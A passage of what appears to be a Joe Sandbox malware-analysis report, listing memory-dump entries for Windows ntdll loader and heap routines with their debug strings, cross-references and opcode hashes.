                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                      • API String ID: 3446177414-1745908468
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8DD879
                                                                                                                                                        • Part of subcall function 1E8B4779: RtlDebugPrintTimes.NTDLL ref: 1E8B4817
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$$$8,p$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-3738132362
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8A651C
                                                                                                                                                        • Part of subcall function 1E8A6565: RtlDebugPrintTimes.NTDLL ref: 1E8A6614
                                                                                                                                                        • Part of subcall function 1E8A6565: RtlDebugPrintTimes.NTDLL ref: 1E8A665F
                                                                                                                                                      Strings
                                                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1E909790
                                                                                                                                                      • LdrpInitShimEngine, xrefs: 1E909783, 1E909796, 1E9097BF
                                                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1E9097B9
                                                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1E90977C
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E9097A0, 1E9097C9
                                                                                                                                                      • apphelp.dll, xrefs: 1E8A6446
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-204845295
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                      • API String ID: 3446177414-4227709934
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                      • API String ID: 3446177414-3492000579
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E909885
                                                                                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E909843
                                                                                                                                                      • LdrpLoadShimEngine, xrefs: 1E90984A, 1E90988B
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E909854, 1E909895
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-3589223738
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                      • API String ID: 3446177414-3224558752
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • ---------------------------------------, xrefs: 1E95EDF9
                                                                                                                                                      • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1E95EDE3
                                                                                                                                                      • HEAP: , xrefs: 1E95ECDD
                                                                                                                                                      • Entry Heap Size , xrefs: 1E95EDED
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                      • API String ID: 3446177414-1102453626
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                      • API String ID: 3446177414-1222099010
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$@
                                                                                                                                                      • API String ID: 3446177414-1194432280
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E923439
                                                                                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 1E92344A, 1E923476
                                                                                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 1E923466
                                                                                                                                                      • LdrpFindDllActivationContext, xrefs: 1E923440, 1E92346C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                      • API String ID: 3446177414-3779518884
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1E91A79F
                                                                                                                                                      • LdrpDynamicShimModule, xrefs: 1E91A7A5
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E91A7AF
                                                                                                                                                      • apphelp.dll, xrefs: 1E8D2382
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 0-176724104
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 3446177414-3610490719
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 1E919F1C
                                                                                                                                                      • LdrpCheckModule, xrefs: 1E919F24
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E919F2E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-161242083
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                      • API String ID: 3446177414-2283098728
                                                                                                                                                      • Opcode ID: 327ee4a9f29d3afaa92717f7b94d5f985897b93956a00249fa3975773f5e744c
                                                                                                                                                      • Instruction ID: 26231f69fd9affdda2d8a923c04133c5bf282a4dcbabc8451240df92e4f22833
                                                                                                                                                      • Opcode Fuzzy Hash: 327ee4a9f29d3afaa92717f7b94d5f985897b93956a00249fa3975773f5e744c
                                                                                                                                                      • Instruction Fuzzy Hash: 635103346047469BC714DF38C884A6977A3BFC4724F180B2DE556AB6D5EBB0E819CB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 1E9280E9
                                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 1E9280E2
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E9280F3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-1783798831
                                                                                                                                                      • Opcode ID: 2de34aacfefc48e9f657c1b94328eda0ece676b0a917078bd556cb190353ea88
                                                                                                                                                      • Instruction ID: 3deba6ef43fa002e508b819e1729657c9f121ec7db323456b1033ad7a258b6ef
                                                                                                                                                      • Opcode Fuzzy Hash: 2de34aacfefc48e9f657c1b94328eda0ece676b0a917078bd556cb190353ea88
                                                                                                                                                      • Instruction Fuzzy Hash: 4E41C3B5918395ABC711DF68DC80B9B77E9AFC5650F014B2EF948972A5EB30E800CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1E934508
                                                                                                                                                      • LdrpCheckRedirection, xrefs: 1E93450F
                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 1E934519
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                      • API String ID: 3446177414-3154609507
                                                                                                                                                      • Opcode ID: 80c46eede089bfe77bbfc0ffe475d33ea95d92ee51f74c400111ede1f5d1d829
                                                                                                                                                      • Instruction ID: f9baf58a8a3cb25319cb36b62dde0c12f4ec6237ce1c593a6330d4a4a365dbf9
                                                                                                                                                      • Opcode Fuzzy Hash: 80c46eede089bfe77bbfc0ffe475d33ea95d92ee51f74c400111ede1f5d1d829
                                                                                                                                                      • Instruction Fuzzy Hash: 5B41B03A6142219BCB12CF79D848A5677EBAF88752B270B7DEC9897355D730EC008F91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Wow64 Emulation Layer
                                                                                                                                                      • API String ID: 3446177414-921169906
                                                                                                                                                      • Opcode ID: 8a9779b77936d709f7e80b663a36317e8bba99cd6da6e7207084c04f89fd1fde
                                                                                                                                                      • Instruction ID: bc3b4e6b1089beb7e32d916fe1d3c012bcd337d921a61a98c7cccc1e2e8e0d6b
                                                                                                                                                      • Opcode Fuzzy Hash: 8a9779b77936d709f7e80b663a36317e8bba99cd6da6e7207084c04f89fd1fde
                                                                                                                                                      • Instruction Fuzzy Hash: 7321F7B990015DBFEB029BA48D84DFF7B7DFF49299B140654FA01A2240EB30EE01DB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c35b5c8876e87fcb1666956197b38c39bd9a379330fe326f760afbcb267188cc
                                                                                                                                                      • Instruction ID: 334d5de6910d52b6bca45d495cbf0c4510ebf8ca9fd50bc3a81404120ee235bb
                                                                                                                                                      • Opcode Fuzzy Hash: c35b5c8876e87fcb1666956197b38c39bd9a379330fe326f760afbcb267188cc
                                                                                                                                                      • Instruction Fuzzy Hash: D9E10274D00749CFCB25CFAAC980A9DBBF6FF48314F104A6AE446A72A4D730A885DF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 3577419014406281db00ebc80ac2a4ec9fec04ba81fc58f9f39087e88b04d607
                                                                                                                                                      • Instruction ID: 41df72a2d3e60a360b3a87d5a599b17b041d118d0044bd20ad47cdca7ce784be
                                                                                                                                                      • Opcode Fuzzy Hash: 3577419014406281db00ebc80ac2a4ec9fec04ba81fc58f9f39087e88b04d607
                                                                                                                                                      • Instruction Fuzzy Hash: CD712275E0022A9FDF06CFA4C884BEDBBB5BF48314F54462AE905BB258D734A901CF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 97b14d3bf8f0da33b18e068f35ef6cc6a1af7ae86a5991a0935e4b96c11cc701
                                                                                                                                                      • Instruction ID: 10a79a7269905eea22202fb4548abb4920e13e959e3ffc25b23b305d866aa4bf
                                                                                                                                                      • Opcode Fuzzy Hash: 97b14d3bf8f0da33b18e068f35ef6cc6a1af7ae86a5991a0935e4b96c11cc701
                                                                                                                                                      • Instruction Fuzzy Hash: 3A519A7471461A9FDB49CE19C8A0E19B3E6FF8A310B144A6DD906CB724DBB9EC41CF80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 6e903f89d774a8e7cdcdf6ba1127171fa02f3473f6a769eafb0723191d390889
                                                                                                                                                      • Instruction ID: 8e0748d64d182366c6a5ca62509513fac4986041ce5f299f19474a673048847f
                                                                                                                                                      • Opcode Fuzzy Hash: 6e903f89d774a8e7cdcdf6ba1127171fa02f3473f6a769eafb0723191d390889
                                                                                                                                                      • Instruction Fuzzy Hash: B55132B2E1121A9FDF09CF95D880AEDBBB6BF88314F04822EE805BB254D7359940CF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4281723722-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 0$Flst
                                                                                                                                                      • API String ID: 0-758220159
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E8B0586
                                                                                                                                                      • kLsE, xrefs: 1E8B05FE
                                                                                                                                                      Memory Dump Source
